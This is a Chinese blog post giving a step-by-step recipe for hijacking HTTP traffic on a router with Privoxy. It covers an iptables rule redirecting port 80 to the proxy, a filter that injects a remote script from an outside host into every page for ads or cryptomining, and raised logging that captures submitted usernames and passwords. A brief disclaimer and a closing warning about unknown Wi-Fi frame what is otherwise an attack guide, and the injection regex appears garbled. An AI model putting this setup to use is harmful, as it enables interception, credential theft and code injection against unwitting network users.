利用privoxy劫持http网站数据,插入广告,获取用户名,密码

看了几篇privoxy的文章，感觉讲的都不详细，在此整理一遍。

注：本文下面的内容仅讨论思路，作为技术交流之用，请勿用作非法途径.

Privoxy是一款带过滤功能的代理服务器，针对HTTP、HTTPS协议。通过Privoxy的过滤功能，用户可以保护隐私、对网页内容进行过滤、管理cookies，以及拦阻各种广告等。Privoxy可以用作单机，也可以应用到多用户的网络。

Privoxy基于Internet Junkbuster，按照GNU General Public License进行发布。可以在Linux、Windows、Mac OS X、AmigaOS、BeOS，以及各种Unix上运行。

----来自百度百科

privoxy功能很强大,可以用来过滤广告,那么我们也可以用它来插入广告,甚至淘宝返利....

先上图..

环境:免费的K3刷官改版.

刷完系统后 安装 privoxy

命令:

opkg install privoxy

然后编辑 config 文件

vi /tmp/media/nand/opt/etc/privoxy/config

修改listen-address 为如下形式

listen-address  192.168.2.1:8118
accept-intercepted-requests 1

192.168.2.1 为 路由器IP 8118为privoxy的默认监听端口

action 文件

vi /tmp/media/nand/opt/etc/privoxy/user.action

加入以下内容 代表拦截所有网址

+filter{ad}}
.*

filter文件

vi /tmp/media/nand/opt/etc/privoxy/user.filter

FILTER: ad Add ad
s||http://www.abc.com/ad.js"> $0|g

很简单的正则,表示在body标签后插入一段js, 这个js里面就控制了想要插入的广告内容.

这里只分析一下原理,就不放示例代码了... 相信各位大神,都会的....

最后一步 把80端口的数据都转发到8118去,即privoxy监听的端口

iptables -t nat -A PREROUTING -s 0.0.0.0/0.0.0.0 -p tcp --dport 80 -j REDIRECT --to-ports 8118

最后的效果就是第一张图...所以的http网站都被插入了一段js 用来执行代码,甚至用来挖矿...

privoxy功能不只是修改网页内容,还可以记录访问记录..

甚至可以记录下网页提交的表单,这就意味着, 用户名和密码 也在其中..

修改config中的debug级别即可...(默认的日志只记录请求的url.)

至于privoxy还能干嘛,大家自己发挥吧...

所以,,这告诉我们一个道理,不要随便连接陌生wifi...要连接也要尽量访问https网站..